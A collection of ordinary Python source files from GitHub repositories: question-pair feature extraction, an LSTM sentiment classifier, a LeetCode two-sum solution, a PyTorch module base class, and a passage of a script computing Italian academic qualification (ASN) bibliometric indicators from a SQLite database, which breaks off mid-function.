self.token_features))\n self.data[\"cwc_max\"] = list(map(lambda x: x[1], self.token_features))\n self.data[\"csc_min\"] = list(map(lambda x: x[2], self.token_features))\n self.data[\"csc_max\"] = list(map(lambda x: x[3], self.token_features))\n self.data[\"ctc_min\"] = list(map(lambda x: x[4], self.token_features))\n self.data[\"ctc_max\"] = list(map(lambda x: x[5], self.token_features))\n self.data[\"last_word_eq\"] = list(map(lambda x: x[6], self.token_features))\n self.data[\"first_word_eq\"] = list(map(lambda x: x[7], self.token_features))\n self.data[\"abs_len_diff\"] = list(map(lambda x: x[8], self.token_features))\n self.data[\"mean_len\"] = list(map(lambda x: x[9], self.token_features))\n\n self.data[\"token_set_ratio\"] = self.data.apply(lambda x: fuzz.token_set_ratio(x[\"question1\"], x[\"question2\"]), axis=1)\n self.data[\"token_sort_ratio\"] = self.data.apply(lambda x: fuzz.token_sort_ratio(x[\"question1\"], x[\"question2\"]), axis=1)\n self.data[\"fuzz_ratio\"] = self.data.apply(lambda x: fuzz.QRatio(x[\"question1\"], x[\"question2\"]), axis=1)\n self.data[\"fuzz_partial_ratio\"] = self.data.apply(lambda x: fuzz.partial_ratio(x[\"question1\"], x[\"question2\"]), axis=1)\n\n self.data[\"longest_substr_ratio\"] = self.data.apply(lambda x: self.get_longest_substr_ratio(x[\"question1\"], x[\"question2\"]), axis=1)\n\n return 
self.data\n\n","repo_name":"IMsumitkumar/Quora-question-pair-similarity-end-to-end","sub_path":"src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":7522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"2904053058","text":"import pandas as pd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\n\nfrom collections import Counter\n\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.preprocessing.text import Tokenizer\n\nfrom keras.models import Sequential\nfrom keras.callbacks import ModelCheckpoint\nfrom keras import layers, regularizers\nfrom keras.layers import Embedding, LSTM, Dense, SpatialDropout1D, Dropout\n\nnltk.download('stopwords')\nnltk.download('wordnet')\nnltk.download('punkt')\n\nlemmatizer = WordNetLemmatizer()\nstop = stopwords.words('english')\nstop.extend(['@', '.', '#', 'user'])\n\n# Loading Data and Sanity Checks\ntrain_data_add = \"./Data/dataset.csv\"\ntrain_data = pd.read_csv(train_data_add)\n\n## Checking Data\nprint(\"Training Data\")\nprint(train_data.head(3))\nprint(\"Length of Train data = \", len(train_data))\ntrain_data.head(5)\n\n# Pre-Processing\n\"\"\"\nPre-processing of data\n 0) Making Every tweet to lowercase\n 1) Tokenization\n 2) Stop Word \n 3) Lemmatization\n\"\"\"\n\n## Converting to Lower Case\ncount = 0\nfor i in range(len(train_data)):\n try:\n train_data.iloc[i, 0] = train_data.iloc[i, 0].lower()\n except:\n train_data.iloc[i, 0] = str(train_data.iloc[i, 0]).lower()\n pass\nprint(\"Training Data : \", train_data.iloc[0, 0])\n\n## Tokenization\ntokens = []\nfor i in range(len(train_data)):\n tokens.append(nltk.word_tokenize(train_data.iloc[i, 0]))\nprint(\"After Tokenizing : \", tokens[0])\n\n## Stop Word Removal\nfiltered_tokens = []\nfor i in range(len(tokens)):\n filtered_tokens.append([word for word in tokens[i] if word not in stop])\nprint(\"After Removing Stop Words : \", filtered_tokens[0])\n\n## Lemmatization\nlemmatizers = []\nfor i in range(len(filtered_tokens)):\n lemmatizers.append([lemmatizer.lemmatize(word) for word in filtered_tokens[i]])\nprint(\"After Lemmatization : \", lemmatizers[0])\n\ntotal_words = []\nfor i in range(len(lemmatizers)):\n total_words.extend(lemmatizers[i])\n\n## Extra Tokenizer\n\ntokenizer = Tokenizer(\n num_words=len(total_words),\n filters= '\"#$%&()*+-/:,;<=>@[\\]^_`{|}~'\n)\ntokenizer.fit_on_texts(lemmatizers)\n\n# Pictorial Analysis of Word Lengths\n\n\"\"\"\n The next step currently is converting these words into numbers based on occurrences and padding with zeros for length \n\"\"\"\nword_lengths = []\nfor i in range(len(lemmatizers)):\n word_lengths.append(len(lemmatizers[i]))\nmean = sum(word_lengths) / len(word_lengths)\n# plt.hist(word_lengths)\n# plt.show()\n# Over here The max_length represents the max length of phrase taken into consideration\nmax_len = round(mean)\nprint(\"Mean Length of tweets : \", max_len)\n\n# One Hot Encoding of the Data\npos = []\nmid = []\nneg = []\nfor l in range(len(train_data.iloc[:, 1])):\n if train_data.iloc[l, 1] == 0:\n pos.append(0)\n mid.append(0)\n neg.append(1)\n elif train_data.iloc[l, 1] == 1:\n pos.append(0)\n mid.append(1)\n neg.append(0)\n else:\n pos.append(1)\n mid.append(0)\n neg.append(0)\ntrain_data['Pos'] = pos\ntrain_data['Mid'] = mid\ntrain_data[\"Neg\"] = neg\nprint(\"\\n Training Data\")\nprint(train_data.head(2))\n\n# Finding Highest frequency of 
words and creating the int dict\nlemmatizers_to_int = Counter(total_words)\ntotal_word_count = len(total_words)\nprint(\"\\n\\nTotal Word Count : \", total_word_count)\n\nsorted_order = lemmatizers_to_int.most_common(total_word_count)\nprint(\"Top 5 repeated Words : \", [word for (word,key) in sorted_order[0:5]])\n\nvocab_to_index = {w: i + 1 for i, (w, c) in enumerate(sorted_order)}\n\n## Encoding to numbers\nnum_encoded_reviews = []\nfor i in range(len(lemmatizers)):\n num_encoded_reviews.append([vocab_to_index[word] for word in lemmatizers[i]])\nprint(\"Num Encoded First Tweet : \", num_encoded_reviews[0])\n\n## Padding and truncating\npadded_reviews = pad_sequences(num_encoded_reviews, maxlen=max_len)\nprint(\"Padded First Tweet : \",padded_reviews[0])\n\n# Modelling and Training\n## X_train and Y_train\nX_train = np.array(padded_reviews[0:int(len(padded_reviews) * 0.8)])\nY_train = train_data.loc[0:int(len(padded_reviews) * 0.8) - 1, [\"Pos\", \"Mid\", \"Neg\"]] # .loc is end-inclusive, so stop one label early to match X_train\n\n## X_test and Y_test\nX_test = np.array(padded_reviews[int(len(padded_reviews) * 0.8):])\nY_test = train_data.loc[int(len(padded_reviews) * 0.8):len(padded_reviews), [\"Pos\", \"Mid\", \"Neg\"]]\n\ncheckpoint1_Model1 = ModelCheckpoint(\".ipynb_checkpoints/best_mode1_15-02-2021.hdf5\", monitor='accuracy', save_best_only=True,\n save_weights_only=False)\ncheckpoint1_Model2 = ModelCheckpoint(\".ipynb_checkpoints/best_mode2_15-02-2021.hdf5\", monitor='accuracy', save_best_only=True,\n save_weights_only=False)\n\n## Model 1\n# Now we are ready to train our model through LSTM network\nmodel = Sequential()\nmodel.add(layers.Embedding(len(vocab_to_index) + 1, output_dim=45, input_length=max_len))\nmodel.add(SpatialDropout1D(0.3))\nmodel.add(layers.LSTM(45))\nmodel.add(layers.Dense(10, activation='relu', input_shape=(45,)))\nmodel.add(layers.Dense(3, activation='softmax', input_shape=(10,)))\n\nmodel.compile(optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\nprint(\"Model 1 : \")\nprint(model.summary())\n\n# Our vectorized labels\nmodel.fit(X_train, Y_train, validation_split=0.2, epochs=16, callbacks=[checkpoint1_Model1], verbose=1)\n\n## Model 2\nmodel_lstm = Sequential()\nmodel_lstm.add(Embedding(input_dim=len(vocab_to_index) + 1, output_dim=256, input_length=max_len))\nmodel_lstm.add(SpatialDropout1D(0.3))\nmodel_lstm.add(LSTM(256, dropout=0.3, recurrent_dropout=0.3))\nmodel_lstm.add(Dense(256, activation='relu'))\nmodel_lstm.add(Dropout(0.3))\nmodel_lstm.add(Dense(3, activation='softmax'))\nmodel_lstm.compile(\n loss='categorical_crossentropy',\n optimizer='Adam',\n metrics=['accuracy']\n)\nprint(\"Model 2 : \")\nprint(model_lstm.summary())\n\nhistory = model_lstm.fit(\n X_train,\n Y_train,\n validation_split=0.1,\n epochs=16,\n batch_size=512,\n callbacks=[checkpoint1_Model2]\n)\n\n# Evaluation\n## Model 1\n# Evaluate the model on the test data using `evaluate`\nprint(\"Evaluate on test data\")\nresults = model.evaluate(X_test, Y_test, batch_size=128)\nprint(\"test loss, test acc:\", results)\n\n# Generate predictions (probabilities -- the output of the last layer)\n# on new data using `predict`\nprint(\"Generate predictions for 1 sample\")\npredictions = model.predict(X_test[:1])\nprint(\"predictions shape:\", predictions.shape)\n\nprint(np.around(predictions, 2), np.array(Y_test[:1]))\n\n## Model 2\n# Evaluate the model on the test data using `evaluate`\nprint(\"Evaluate on test data\")\nresults = model_lstm.evaluate(X_test, Y_test, batch_size=128)\nprint(\"test loss, test acc:\", results)\n
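\n# Hedged aside (added note, not in the original script): a softmax output row can\n# be mapped back to a class by taking the argmax over the one-hot column order\n# used above, i.e. columns ['Pos', 'Mid', 'Neg']:\n# predicted_labels = predictions.argmax(axis=1) # 0 -> Pos, 1 -> Mid, 2 -> Neg\n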
\n# Generate predictions (probabilities -- the output of the last layer)\n# on new data using `predict`\nprint(\"Generate predictions for 5 samples\")\npredictions = model_lstm.predict(X_test[:5])\nprint(\"predictions shape:\", predictions.shape)\n\nprint(np.around(predictions, 2), np.array(Y_test[:5]))\n","repo_name":"unKNOWN-G/Projects","sub_path":"Sentimental_Analysis/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7081,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"5206219619","text":"'''\r\nAuthor: ZHAO Zinan\r\nCreated: 12/01/2018\r\n\r\n167. Two Sum II - Input array is sorted\r\nhttps://leetcode.com/problems/two-sum-ii-input-array-is-sorted/description/\r\n'''\r\nclass Solution(object):\r\n def twoSum(self, numbers, target):\r\n \"\"\"\r\n :type numbers: List[int]\r\n :type target: int\r\n :rtype: List[int]\r\n \"\"\"\r\n i = 0\r\n j = len(numbers)-1\r\n\r\n while i < j:\r\n sumtwo = numbers[i] + numbers[j]\r\n if sumtwo == target:\r\n return [i+1, j+1]\r\n elif sumtwo < target:\r\n i += 1\r\n else:\r\n j -= 1\r\n \r\n ","repo_name":"zi-NaN/algorithm_exercise","sub_path":"leetcode/167.py","file_name":"167.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32093186574","text":"import torch\nimport numpy as np\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport time\nVERY_SMALL_NUMBER = 1e-10\nVERY_NEG_NUMBER = -100000000000\n\n\nclass BaseInstruction(torch.nn.Module):\n\n def __init__(self, args):\n super(BaseInstruction, self).__init__()\n self._parse_args(args)\n self.share_module_def()\n\n def _parse_args(self, args):\n self.device = torch.device('cuda' if args['use_cuda'] else 'cpu')\n # self.share_encoder = args['share_encoder']\n self.q_type = args['q_type']\n self.num_step = args['num_step']\n self.lstm_dropout = args['lstm_dropout']\n self.linear_dropout = args['linear_dropout']\n\n for k, v in args.items():\n if k.endswith('dim'):\n setattr(self, k, v)\n if k.endswith('emb_file') or k.endswith('kge_file'):\n if v is None:\n setattr(self, k, None)\n else:\n setattr(self, k, args['data_folder'] + v)\n\n self.reset_time = 0\n\n def share_module_def(self):\n # dropout\n self.lstm_drop = nn.Dropout(p=self.lstm_dropout)\n self.linear_drop = nn.Dropout(p=self.linear_dropout)\n\n def init_hidden(self, num_layer, batch_size, hidden_size):\n return (torch.zeros(num_layer, batch_size, hidden_size).to(self.device),\n torch.zeros(num_layer, batch_size, hidden_size).to(self.device))\n\n def encode_question(self, *args):\n # constituency tree or query_text\n pass\n\n def get_instruction(self, *args):\n # expected return : question_emb, attn_weight\n pass\n\n @staticmethod\n def get_node_emb(query_hidden_emb, action):\n '''\n\n :param query_hidden_emb: (batch_size, max_hyper, emb)\n :param action: (batch_size)\n :return: (batch_size, 1, emb)\n '''\n batch_size, max_hyper, _ = query_hidden_emb.size()\n row_idx = torch.arange(0, batch_size).type(torch.LongTensor)\n q_rep = query_hidden_emb[row_idx, action, :]\n return q_rep.unsqueeze(1)\n
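\n# Hedged aside (added note, not part of the original module): get_node_emb picks\n# one time-step per batch element via advanced indexing; it should be equivalent to\n# torch.gather(query_hidden_emb, 1, action.view(-1, 1, 1).expand(-1, 1, query_hidden_emb.size(-1)))\n# e.g. query_hidden_emb of shape (2, 5, 8) with action = tensor([3, 0]) yields a (2, 1, 8) tensor.\n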
","repo_name":"RichardHGL/WSDM2021_NSM","sub_path":"NSM/Modules/Instruction/base_instruction.py","file_name":"base_instruction.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"67"} +{"seq_id":"1375309991","text":"import sqlite3\nfrom sqlite3 import Error\nfrom glob import glob\nimport json\nimport csv\nimport sys\nimport os\nimport string \n\nimport datetime\nimport time\nimport requests\nimport ast\nimport re\nfrom lxml import html\nimport urllib.parse\n\nimport conf\nimport apikeys\n\nfrom datetime import datetime\nfrom scholarmetrics import hindex\n\n\ndatabase = {\n\t\"01/B1\": \"../data/output/informatici_settori.db\",\n\t\"09/H1\": \"../data/output/informatici_settori.db\",\n\t\"13/D1\": \"../data/output/statistici_settori.db\",\n\t\"13/D2\": \"../data/output/statistici_settori.db\",\n\t\"13/D3\": \"../data/output/statistici_settori.db\",\n\t\"INFO\": \"../data/output/informatici.db\",\n\t\"STAT\": \"../data/output/statistici.db\"\n}\n\nASNtsvFiles_Indicatori = {\n\t\"INFO\": \"../data/output/informatici_indicatoriPoggi_inCV.tsv\",\n\t\"STAT\": \"../data/output/statistici_indicatoriPoggi_inCV.tsv\"\n}\n\nASNtsvFiles_Titoli = {\n\t\"INFO\": \"../data/output/informatici_titoliPoggi.tsv\",\n\t\"STAT\": \"../data/output/statistici_titoliPoggi.tsv\"\n}\n\nsectors = ['01/B1','09/H1',\"INFO\",\"13/D1\",\"13/D2\",\"13/D3\",\"STAT\"]\n\n# Session dates ASN 2016-2018: 2016-12-02 2017-04-03 2017-08-04 2017-12-05 2018-04-06\n\"\"\"D.M. 7 giugno 2016, n. 120, Art. 2:\n\t...from January 1 of, respectively, the tenth year (first tier) and the fifth year (second tier) preceding the end of the four-month application-submission window;\"\"\"\nASN2016deadlines_i1 = {\n\t\"start\": {\n\t\t1: {1: \"2006-01-01\", 2: \"2007-01-01\", 3: \"2007-01-01\", 4: \"2007-01-01\", 5: \"2008-01-01\"},\n\t\t2: {1: \"2011-01-01\", 2: \"2012-01-01\", 3: \"2012-01-01\", 4: \"2012-01-01\", 5: \"2013-01-01\"}\n\t},\n\t\"end\": {1: \"2016-12-02\", 2: \"2017-04-03\", 3: \"2017-08-04\", 4: \"2017-12-05\", 5: \"2018-04-06\"}\n}\n\nASN2016deadlines_i2_i3 = {\n\t\"start\": {\n\t\t1: {1: \"2001-01-01\", 2: \"2002-01-01\", 3: \"2002-01-01\", 4: \"2002-01-01\", 5: \"2003-01-01\"},\n\t\t2: {1: \"2006-01-01\", 2: \"2007-01-01\", 3: \"2007-01-01\", 4: \"2007-01-01\", 5: \"2008-01-01\"}\n\t},\n\t\"end\": {1: \"2016-12-02\", 2: \"2017-04-03\", 3: \"2017-08-04\", 4: \"2017-12-05\", 5: \"2018-04-06\"}\n}\n\nstrDays = \"+30\"\njsonFolderCv = \"../data/input/mobiliti/JSON/\" \n\ndef create_connection(db_file):\n\t\"\"\" create a database connection to the SQLite database\n\t\tspecified by the db_file\n\t:param db_file: database file\n\t:return: Connection object or None\n\t\"\"\"\n\tconn = None\n\ttry:\n\t\tconn = sqlite3.connect(db_file)\n\texcept Error as e:\n\t\tprint(e)\n \n\treturn conn\n\n\ndef create_table(conn, create_table_sql):\n\t\"\"\" create a table from the create_table_sql statement\n\t:param conn: Connection object\n\t:param create_table_sql: a CREATE TABLE statement\n\t:return:\n\t\"\"\"\n\ttry:\n\t\tc = conn.cursor()\n\t\tc.execute(create_table_sql)\n\texcept Error as e:\n\t\tprint(e)\n\n\ndef select_cvid(conn):\n\n\tquery_publications = \"\"\"\n\t\tSELECT DISTINCT id, authorId, settore, quadrimestre, fascia, bibl, I1, I2, I3\n\t\tFROM curriculum\n\t\"\"\"\n\n\tcur = conn.cursor()\n\tcur.execute(query_publications)\n\trows = cur.fetchall()\n\treturn rows\n\n\ndef select_titoli(conn):\n\n\tquery_publications = \"\"\"\n\t\tSELECT DISTINCT id, authorId, settore, quadrimestre, fascia, titoliCounter.'titolo-01', titoliCounter.'titolo-02', titoliCounter.'titolo-03', titoliCounter.'titolo-04', titoliCounter.'titolo-05', titoliCounter.'titolo-06', titoliCounter.'titolo-07', titoliCounter.'titolo-08', 
titoliCounter.'titolo-09', titoliCounter.'titolo-10', titoliCounter.'titolo-11'\n\t\tFROM curriculum\n\t\tINNER JOIN titoliCounter\n\t\tON\n\t\t curriculum.id = titoliCounter.cvId\n\t\"\"\"\n\n\tcur = conn.cursor()\n\tcur.execute(query_publications)\n\trows = cur.fetchall()\n\treturn rows\n\n\ndef select_i1_articles(conn, cvid, quadrimestre, fascia, ASN2016deadlines,strDays,allOrCv):\n\tif allOrCv == \"ALL\":\n\t\tq = \"\"\"\n\t\t\tSELECT DISTINCT curriculum.id, curriculum.authorId, publication.eid\n\t\t\tFROM curriculum\n\t\t\tINNER JOIN wroteRelation\n\t\t\tON\n\t\t\t curriculum.authorId = wroteRelation.authorId\n\t\t\tINNER JOIN publication\n\t\t\tON\n\t\t\t wroteRelation.eid = publication.eid\n\t\t\tWHERE curriculum.id = '{curriculumId}' AND \n\t\t\t publication.publicationDate BETWEEN date('{dateFrom}') AND date('{dateTo}', '{days} days') AND\n\t\t\t ( publication.subtypeDescription = 'Article' OR\n\t\t\t\tpublication.subtypeDescription = 'Article in Press' OR\n\t\t\t\tpublication.subtypeDescription = 'Review' OR\n\t\t\t\tpublication.subtypeDescription = 'Letter' OR\n\t\t\t\tpublication.subtypeDescription = 'Note' OR\n\t\t\t\tpublication.subtypeDescription = 'Short Survey' )\n\t\t\"\"\"\n\telif allOrCv == \"CV\":\n\t\tq = \"\"\"\n\t\t\tSELECT DISTINCT curriculum.id, curriculum.authorId, publication.eid\n\t\t\tFROM curriculum\n\t\t\tINNER JOIN wroteRelationIndexCv\n\t\t\tON\n\t\t\t curriculum.id = wroteRelationIndexCv.idCv\n\t\t\tINNER JOIN publication\n\t\t\tON\n\t\t\t wroteRelationIndexCv.eid = publication.eid\n\t\t\tWHERE \n\t\t\t curriculum.id = '{curriculumId}' AND \n\t\t\t publication.publicationDate BETWEEN date('{dateFrom}') AND date('{dateTo}', '{days} days') AND\n\t\t\t ( publication.subtypeDescription = 'Article' OR\n\t\t\t\tpublication.subtypeDescription = 'Article in Press' OR\n\t\t\t\tpublication.subtypeDescription = 'Review' OR\n\t\t\t\tpublication.subtypeDescription = 'Letter' OR\n\t\t\t\tpublication.subtypeDescription = 'Note' OR\n\t\t\t\tpublication.subtypeDescription = 'Short Survey' ) AND\n\t\t\t wroteRelationIndexCv.indexPubIndCv NOT NULL\n\t\t\"\"\"\t\t\n\telse:\n\t\tprint (\"ERROR in select_i1_articles(): unknown allOrCv parameter provided.\")\n\t\tsys.exit()\n\t\n\tcur = conn.cursor()\n\tcur.execute(q.format(curriculumId=cvid, days=strDays,dateFrom=ASN2016deadlines[\"start\"][fascia][quadrimestre], dateTo=ASN2016deadlines[\"end\"][quadrimestre]))\n\trows = cur.fetchall()\n\treturn rows\n\ndef select_publications(conn, cvid, quadrimestre,fascia,ASN2016deadlines,strDays,allOrCv):\n\tif allOrCv == \"ALL\":\n\t\tq = \"\"\"\n\t\t\tSELECT DISTINCT curriculum.id, curriculum.authorId, publication.eid, publication.publicationDate\n\t\t\tFROM curriculum\n\t\t\tINNER JOIN wroteRelation\n\t\t\tON\n\t\t\t curriculum.authorId = wroteRelation.authorId\n\t\t\tINNER JOIN publication\n\t\t\tON\n\t\t\t wroteRelation.eid = publication.eid\n\t\t\tWHERE curriculum.id = '{curriculumId}' AND\n\t\t\t publication.publicationDate BETWEEN date('{dateFrom}') AND date('{dateTo}', '{days} days')\n\t\t\"\"\"\n\telif allOrCv == \"CV\":\n\t\tq = \"\"\"\n\t\t\tSELECT DISTINCT curriculum.id, curriculum.authorId, publication.eid, publication.publicationDate\n\t\t\tFROM curriculum\n\t\t\tINNER JOIN wroteRelationIndexCv\n\t\t\tON\n\t\t\t curriculum.id = wroteRelationIndexCv.idCv\n\t\t\tINNER JOIN publication\n\t\t\tON\n\t\t\t wroteRelationIndexCv.eid = publication.eid\n\t\t\tWHERE curriculum.id = '{curriculumId}' AND\n\t\t\t publication.publicationDate BETWEEN date('{dateFrom}') AND date('{dateTo}', 
'{days} days') AND\n\t\t\t wroteRelationIndexCv.indexPubIndCv NOT NULL\n\t\t\"\"\"\n\telse:\n\t\tprint (\"ERROR in select_publications(): unknown allOrCv parameter provided.\")\n\t\tsys.exit()\n\t\n\tcur = conn.cursor()\n\tcur.execute(q.format(curriculumId=cvid, days=strDays, dateFrom=ASN2016deadlines[\"start\"][fascia][quadrimestre], dateTo=ASN2016deadlines[\"end\"][quadrimestre]))\n\trows = cur.fetchall()\n\treturn rows\n\n\ndef select_i2_numCitations(conn,eid,quadrimestre,fascia):\n\tq = \"\"\"\n\t\tSELECT *\n\t\tFROM citationCount\n\t\tWHERE eid = '{pubId}'\n\t\"\"\"\n\t\n\tcur = conn.cursor()\n\tcur.execute(q.format(pubId=eid))\n\trows = cur.fetchall()\n\tif len(rows) == 0:\n\t\t# missing citation record -> return 0\n\t\tprint (\"WARNING: select_i2_numCitations() - missing citation record for paper '%s' -> return 0 citations\" % eid)\n\t\treturn 0\n\telif len(rows) != 1:\n\t\tprint (\"ERROR: select_i2_numCitations() - returned %d citation records for paper '%s' -> Exit.\" % (len(rows),eid))\n\t\tsys.exit()\n\t\n\trow = rows[0]\n\tcitTot = row[2]\n\tcitPre2000 = row[3]\n\tcit2000 = row[4]\n\tcit2001 = row[5]\n\tcit2002 = row[6]\n\tcit2003 = row[7]\n\tcit2004 = row[8]\n\tcit2005 = row[9]\n\tcit2006 = row[10]\n\tcit2007 = row[11]\n\tcit2008 = row[12]\n\tcit2009 = row[13]\n\tcit2010 = row[14]\n\tcit2011 = row[15]\n\tcit2012 = row[16]\n\tcit2013 = row[17]\n\tcit2014 = row[18]\n\tcit2015 = row[19]\n\tcit2016 = row[20]\n\tcit2017 = row[21]\n\tcit2018 = row[22]\n\tcit2019 = row[23]\n\tcit2020 = row[24]\n\n\t# Session dates ASN 2016-2018: 2016-12-02 2017-04-03 2017-08-04 2017-12-05 2018-04-06\n\tif fascia == 1:\n\t\t# citations in the last 15 years (prima fascia)\n\t\tif quadrimestre == 1:\n\t\t\t# keep citations from 2001 through 2015\n\t\t\tcit = citTot - (citPre2000 + cit2000 + cit2016 + cit2017 + cit2018 + cit2019 + cit2020)\n\t\telif quadrimestre == 5:\n\t\t\t# keep citations from 2003 through 2017\n\t\t\tcit = citTot - (citPre2000 + cit2000 + cit2001 + cit2002 + cit2018 + cit2019 + cit2020)\n\t\telse:\n\t\t\t# keep citations from 2002 through 2016\n\t\t\tcit = citTot - (citPre2000 + cit2000 + cit2001 + cit2017 + cit2018 + cit2019 + cit2020)\n\telse:\n\t\t# citations in the last 10 years (seconda fascia)\n\t\tif quadrimestre == 1:\n\t\t\t# keep citations from 2006 through 2015\n\t\t\tcit = cit2006 + cit2007 + cit2008 + cit2009 + cit2010 + cit2011 + cit2012 + cit2013 + cit2014 + cit2015\n\t\telif quadrimestre == 5:\n\t\t\t# keep citations from 2008 through 2017\n\t\t\tcit = cit2008 + cit2009 + cit2010 + cit2011 + cit2012 + cit2013 + cit2014 + cit2015 + cit2016 + cit2017\n\t\telse:\n\t\t\t# keep citations from 2007 through 2016\n\t\t\tcit = cit2007 + cit2008 + cit2009 + cit2010 + cit2011 + cit2012 + cit2013 + cit2014 + cit2015 + cit2016\n\treturn cit\n\n
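# --- Added aside (hypothetical helper, not in the original script) --------
# The per-year columns above sit at fixed offsets (row[4] is cit2000 ...
# row[24] is cit2020), so each branch is a contiguous year window:
def citations_in_window(row, first_year, last_year):
	# row[4 + (y - 2000)] holds the citations received in year y
	return sum(row[4 + (y - 2000)] for y in range(first_year, last_year + 1))
# e.g. citations_in_window(row, 2001, 2015) reproduces the fascia 1 /
# quadrimestre 1 branch above, assuming totalCitations equals the sum of
# citPre2000 plus all the per-year columns.
# --------------------------------------------------------------------------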
\n\t\t\"\"\"\n\telif allOrCv == \"CV\":\n\t\tq = \"\"\"SELECT DISTINCT curriculum.id, curriculum.authorId, publication.eid, citationCount.totalCitations, citationCount.'2017', citationCount.'2018', citationCount.'2019', citationCount.'2020' \n\t\t\tFROM curriculum\n\t\t\tINNER JOIN wroteRelationIndexCv\n\t\t\tON\n\t\t\t curriculum.id = wroteRelationIndexCv.idCv\n\t\t\tINNER JOIN publication\n\t\t\tON\n\t\t\t wroteRelationIndexCv.eid = publication.eid\n\t\t\tINNER JOIN citationCount\n\t\t\tON\n\t\t\t publication.eid = citationCount.eid\n\t\t\tWHERE curriculum.id = '{curriculumId}' AND\n\t\t\t publication.publicationDate <= '{endDate}' AND\n\t\t\t wroteRelationIndexCv.indexPubIndCv NOT NULL\n\t\t\"\"\"\n\telse:\n\t\tprint (\"ERROR in select_publications_citations(): unknown allOrCv parameter provided.\")\n\t\tsys.exit()\n\tcur = conn.cursor()\n\tcur.execute(q.format(curriculumId=cvid, endDate=ASNdeadlines[quadrimestre]))\n\trows = cur.fetchall()\n\treturn rows\n\n\ndef computeASN2016Indicators(dbfile, outputTsvIndicatori,allOrCv=\"ALL\"):\n\t\"\"\"Art. 2\nValori-soglia degli indicatori per i candidati all'Abilitazione Scientifica Nazionale\n\n1. In attuazione di quanto disposto dall'art. 1, comma 1, e con riferimento all'Allegato C del D.M. 7 giugno 2016, n. 120, sono definiti nella Tabella 1, relativamente ai candidati all'abilitazione scientifica nazionale per i settori bibliometrici, i valori-soglia, distintamente per la prima e per la seconda fascia, dei seguenti indicatori:\n\na) il numero complessivo di articoli riportati nella domanda e pubblicati su riviste scientifiche contenute nelle banche dati internazionali \"Scopus\" e \"Web of Science\", rispettivamente nei dieci anni (prima fascia) e cinque anni (seconda fascia) precedenti, di seguito denominato \"numero articoli\". Per i candidati, ai fini del calcolo di tale indicatore, sono considerati gli articoli riportati nella domanda, pubblicati e rilevati nelle banche dati internazionali \"Scopus\" e \"Web of Science - Core Collection\" dal 1° gennaio rispettivamente del decimo anno (prima fascia) e del quinto anno (seconda fascia) precedente la scadenza del quadrimestre di presentazione della domanda;\n\nb) il numero di citazioni ricevute dalla produzione scientifica contenuta nella domanda, pubblicata e rilevata dalle banche dati internazionali \"Scopus\" e \"Web of Science\", rispettivamente nei quindici anni (prima fascia) e dieci anni (seconda fascia) precedenti, di seguito denominato \"numero citazioni\". Per i candidati, ai fini del calcolo di tale indicatore, sono considerate le citazioni della produzione scientifica contenuta nella domanda, pubblicata e rilevata nelle banche dati internazionali \"Scopus\" e \"Web of Science - Core Collection\" dal 1° gennaio rispettivamente del quindicesimo anno (prima fascia) e del decimo anno (seconda fascia) precedente la scadenza del quadrimestre di presentazione della domanda;\n\nc) l'indice h di Hirsch, calcolato sulla base delle citazioni rilevate dalle banche dati internazionali \"Scopus\" e \"Web of Science\" con riferimento alle pubblicazioni contenute nella domanda e pubblicate, rispettivamente, nei quindici anni (prima fascia) e dieci anni (seconda fascia) precedenti, di seguito denominato \"Indice H\". 
Per i candidati, ai fini del calcolo di tale indicatore, sono considerate le citazioni di cui alla lettera b) riferite alle pubblicazioni contenute nella domanda, pubblicate e rilevate nelle banche dati internazionali \"Scopus\" e \"Web of Science - Core Collection\" dal 1° gennaio rispettivamente del quindicesimo anno (prima fascia) e del decimo anno (seconda fascia) precedente la scadenza del quadrimestre di presentazione della domanda.\"\"\"\n\t\n\tconn = create_connection(dbfile)\n\twith conn:\n\t\trows = select_cvid(conn)\n\t\tdiffTotal = 0\n\t\tresStr = \"cvId\\tauthorId Scopus\\tsettore\\tquadrimestre\\tfascia\\tI1 poggi (journals)\\tI1 ASN\\tI2 poggi (citazioni)\\tI2 ASN\\tI3 poggi (hIndex)\\tI3 ASN\\tDelta I1\\tDelta I2\\tDelta I3\\n\"\n\t\tfor row in rows:\n\t\t\tcvid = row[0]\n\t\t\tprint (cvid)\n\t\t\tauthorId = row[1]\n\t\t\tsettore = row[2]\n\t\t\tquadrimestre = row[3]\n\t\t\tfascia = row[4]\n\t\t\tbibl = row[5]\n\t\t\ti1 = row[6]\n\t\t\ti2 = row[7]\n\t\t\ti3 = row[8]\n\t\t\t\n\t\t\t# Session dates ASN 2016-2018: 2016-12-02 2017-04-03 2017-08-04 2017-12-05 2018-04-06\t\n\t\t\tif quadrimestre != 47777:\n\t\t\t\tjournals = select_i1_articles(conn, cvid, quadrimestre, fascia,ASN2016deadlines_i1,strDays, allOrCv)\n\t\t\t\ti1Computed = len(journals)\n\t\t\t\tdiffI1 = i1Computed-i1\n\t\t\t\tdiffTotal += diffI1\n\t\t\t\t\n\t\t\t\tpublications = select_publications(conn,cvid,quadrimestre,fascia,ASN2016deadlines_i2_i3,strDays, allOrCv)\n\t\t\t\ti2Computed = 0\n\t\t\t\tfor publication in publications:\n\t\t\t\t\teid = publication[2]\n\t\t\t\t\tcitazioniPaper = select_i2_numCitations(conn,eid,quadrimestre,fascia)\n\t\t\t\t\ti2Computed += citazioniPaper\n\t\t\t\tdiffI2 = i2Computed-i2\n\t\t\t\t\n\t\t\t\tpublicationsHindex = select_publications_citations(conn, cvid, quadrimestre, allOrCv)\n\t\t\t\tcitationsArray = list()\n\t\t\t\tfor publication in publicationsHindex:\n\t\t\t\t\tif quadrimestre == 1:\n\t\t\t\t\t\ttotCitations = 